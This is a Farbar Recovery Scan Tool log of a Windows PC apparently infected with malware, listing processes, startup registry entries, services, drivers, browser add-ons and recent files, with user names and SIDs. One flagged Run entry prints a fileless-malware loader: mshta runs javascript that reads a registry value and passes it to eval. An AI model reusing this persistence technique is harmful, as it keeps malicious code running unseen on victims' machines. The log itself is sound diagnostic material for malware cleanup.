(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel® Corporation) C:\Program Files\Intel\BCA\pabeSvc64.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Pervasive Software Inc.) C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Farbar) \\SPARTA\RedirectedFolders\cjerald\Desktop\FRST64.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585744 2015-08-18] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2011-01-23] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-11-01] (Malwarebytes)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] ()
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**wqgzvwnow<*>] => "C:\Users\cjerald\AppData\Local\322148\4c5510.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] ()
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1
Tcpip\..\Interfaces\{C095AEBB-3422-4678-BFF1-85A8F1306E8D}: [DhcpNameServer] 192.168.0.105 192.168.0.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://msn.com/
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-16] (Oracle Corporation)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-16] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} hxxps://secure.logmein.com//activex/ractrl.cab?lmi=1091

FireFox:
========
FF ProfilePath: C:\Users\cjerald\AppData\Roaming\Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 [2016-11-14]
FF Homepage: Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 -> hxxp://www.msn.com/
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-12-17] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFFPlgn => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-09-26] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-26] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-16] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-16] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-17] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-17] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-09-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1148: @citrixonline.com/appdetectorplugin -> C:\Users\cjerald\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-01-07] (Citrix Online)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default [2016-11-16]
CHR Extension: (Google Docs) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-19]
CHR Extension: (Google Drive) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-13]
CHR Extension: (YouTube) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-13]
CHR Extension: (Google Search) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]
CHR Extension: (Google Docs Offline) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-13]
CHR Extension: (Avast Online Security) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-13]
CHR Extension: (Gmail) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]
CHR Extension: (Chrome Media Router) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-01]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-16] ()
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148560 2015-08-18] (NVIDIA Corporation)
S4 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-07-24] (Citrix Online, a division of Citrix Systems, Inc.)
R2 IntelBCAsvc; C:\Program Files\Intel\BCA\pabeSvc64.exe [3020440 2015-11-25] (Intel® Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706128 2015-08-18] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833360 2015-08-18] (NVIDIA Corporation)
R2 psqlWGE; C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe [435488 2009-11-17] (Pervasive Software Inc.)
R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation)
R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [874784 2016-04-21] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [15736 2016-04-21] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-04-21] (McAfee, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161116.005\BHDrvx64.sys [1854712 2016-09-07] (Symantec Corporation)
R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-04] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161118.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.)
S4 LMIRfsClientNP; no ImagePath
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161118.009\ENG64.SYS [138456 2016-11-16] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161118.009\EX64.SYS [2148056 2016-11-16] (Symantec Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-08-18] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2015-08-18] (NVIDIA Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2016-11-16] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2016-11-16] (Symantec Corporation)
S3 aswVmm; \??\C:\Users\cjerald\AppData\Local\Temp\aswVmm.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-19 16:32 - 2016-11-19 16:32 - 00000000 ____D C:\FRST
2016-11-18 20:58 - 2016-11-19 16:03 - 00000000 ____D C:\Users\cjerald\AppData\Local\322148
2016-11-18 16:04 - 2016-11-18 19:25 - 00000000 ____D C:\Users\cjerald\Pavark
2016-11-18 15:23 - 2016-11-19 16:30 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-11-18 15:20 - 2016-11-18 15:48 - 00000000 ____D C:\Users\cjerald\Downloads\Rootkit Removers
2016-11-16 22:11 - 2016-11-16 22:11 - 06449720 _____ C:\Users\cjerald\Downloads\install_backblaze.exe
2016-11-16 22:08 - 2016-11-18 11:02 - 00000000 ____D C:\Program Files\MyDefrag v4.3.1
2016-11-16 22:08 - 2016-11-16 22:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyDefrag v4.3.1
2016-11-16 22:08 - 2010-05-21 12:11 - 01147392 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.exe
2016-11-16 22:08 - 2010-05-21 12:11 - 00485376 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.scr
2016-11-16 22:07 - 2016-11-16 22:07 - 02082630 _____ (J.C. Kessels ) C:\Users\cjerald\Downloads\MyDefrag-v4.3.1.exe
2016-11-16 21:31 - 2016-11-16 21:31 - 00110424 _____ C:\Users\clayton\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-16 21:19 - 2016-11-16 21:19 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA Corporation
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Windows Small Business Server
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Adobe
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Symantec
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\LogMeIn
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Google
2016-11-16 21:17 - 2016-11-16 21:17 - 00000000 ____D C:\Users\clayton\AppData\Local\VirtualStore
2016-11-16 07:58 - 2016-11-16 07:58 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-16 07:54 - 2016-11-16 07:54 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\Sun
2016-11-16 07:51 - 2016-11-16 07:51 - 00737344 _____ (Oracle Corporation) C:\Users\cjerald\Downloads\chromeinstall-8u111.exe
2016-11-16 02:55 - 2016-11-16 02:55 - 00000000 ____D C:\ProgramData\Sophos
2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\Program Files (x86)\Sophos
2016-11-16 02:50 - 2016-11-16 02:51 - 155406624 _____ (Sophos Limited) C:\Users\cjerald\Downloads\Sophos Virus Removal Tool.exe
2016-11-16 00:34 - 2016-11-16 00:34 - 00448512 _____ (OldTimer Tools) C:\Users\cjerald\Downloads\TFC.exe
2016-11-15 13:32 - 2016-11-15 15:03 - 00044360 __RSH C:\ProgramData\ntuser.pol
2016-11-15 02:13 - 2016-08-22 14:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys
2016-11-15 02:12 - 2016-11-15 02:12 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64 (1).exe
2016-11-14 19:40 - 2016-11-14 19:40 - 00000000 ____D C:\Users\cjerald\AppData\Local\ESET
2016-11-14 19:39 - 2016-11-14 19:39 - 06761600 _____ (ESET spol. s r.o.) C:\Users\cjerald\Downloads\esetonlinescanner_enu.exe
2016-11-14 19:07 - 2016-11-14 19:07 - 00023783 _____ C:\ComboFix.txt
2016-11-14 13:00 - 2016-10-07 18:25 - 00002291 ____N C:\Windows\system32\SetupBD.din
2016-11-14 12:55 - 2016-11-14 12:55 - 81335920 _____ C:\Users\cjerald\Downloads\PROWinx64.exe
2016-11-14 12:43 - 2016-11-14 12:43 - 00362144 _____ (Roadkil.Net ) C:\Users\cjerald\Downloads\CommTest.exe
2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net
2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net
2016-11-09 15:50 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-11-09 15:50 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-09 15:50 - 2016-11-02 10:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-11-09 15:50 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-11-09 15:50 - 2016-11-02 10:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-11-09 15:50 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-09 15:50 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-11-09 15:50 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-11-09 15:50 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-11-09 15:50 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-11-09 15:50 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-11-09 15:50 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-11-09 15:50 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-11-09 15:50 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-11-09 15:50 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-11-09 15:50 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-11-09 15:50 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-11-09 15:50 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-11-09 15:50 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-11-09 15:50 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-11-09 15:50 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-11-09 15:50 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-11-09 15:50 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-11-09 15:50 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-11-09 15:50 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-11-09 15:50 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-11-09 15:50 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-11-09 15:50 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-11-09 15:50 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-11-09 15:50 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-11-09 15:50 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-11-09 15:50 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-11-09 15:50 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
